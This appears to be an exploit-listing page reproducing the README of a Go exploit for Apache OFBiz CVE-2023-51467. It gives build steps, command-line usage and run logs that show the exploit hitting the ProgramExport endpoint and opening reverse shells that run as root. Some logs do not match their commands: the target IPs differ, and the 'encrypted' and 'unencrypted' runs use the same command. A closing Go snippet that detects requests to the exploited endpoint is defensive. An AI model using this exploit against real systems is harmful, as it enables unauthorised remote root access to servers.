## https://sploitus.com/exploit?id=31A981C8-F369-501E-9E07-9A751CE911B4
# Go-Exploit for CVE-2023-51467
This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation includes target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (this requires that the Java runtime in use supports Nashorn). The weaponization process is described on the [VulnCheck blog](https://vulncheck.com/blog/ofbiz-cve-2023-51467).
# Compiling
You can use the makefile to build a docker container:
```sh
make docker
```
Or, if you have a Go build environment ready to go, just use `make`:
```sh
albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell
```
## Example Usage
### Using Docker
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Encrypted Nashorn Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Unencrypted Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"
```
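Every session above shows the request landing at `/webtools/control/ProgramExport/` once the version check passes, so that path is what a defender watches for. As an added example, not code from this repository, here is a Go snippet that scans combined-format web access log lines (constructed samples, not real traffic) and returns the requests that hit the ProgramExport controller:

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// One combined-format access-log line: client, method, request path, HTTP status.
var accessLineRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Finding is one request that reached the endpoint the sessions above exploit.
type Finding struct{ Client, Method, Path, Status string }

// IsProgramExportRequest reports whether a request path hits the OFBiz
// ProgramExport controller seen in the exploit log ("Throwing exploit at ...").
func IsProgramExportRequest(path string) bool {
	if i := strings.IndexByte(path, '?'); i >= 0 {
		path = path[:i] // ignore the query string; only the path matters here
	}
	return strings.Contains(strings.ToLower(path), "/webtools/control/programexport")
}

// ScanAccessLog parses each line and returns those that hit ProgramExport.
func ScanAccessLog(log string) []Finding {
	var out []Finding
	for _, line := range strings.Split(log, "\n") {
		m := accessLineRe.FindStringSubmatch(line)
		if m == nil {
			continue // blank or unparseable line
		}
		if IsProgramExportRequest(m[3]) {
			out = append(out, Finding{Client: m[1], Method: m[2], Path: m[3], Status: m[4]})
		}
	}
	return out
}

// Constructed sample lines (not from the page): one benign request, two hits.
const sampleLog = `10.9.49.131 - - [03/Jan/2024:16:55:20 -0500] "GET /webtools/control/main HTTP/1.1" 200 5120
10.9.49.131 - - [03/Jan/2024:16:55:21 -0500] "POST /webtools/control/ProgramExport/ HTTP/1.1" 200 861
10.9.49.131 - - [03/Jan/2024:16:55:22 -0500] "GET /webtools/control/ProgramExport?x=1 HTTP/1.1" 200 22
`

func main() {
	for _, f := range ScanAccessLog(sampleLog) {
		fmt.Printf("ALERT client=%s %s %s status=%s\n", f.Client, f.Method, f.Path, f.Status)
	}
}
```

Feed it your real access log instead of `sampleLog`; any hit on this endpoint from a host that has no business running OFBiz exports is worth an investigation.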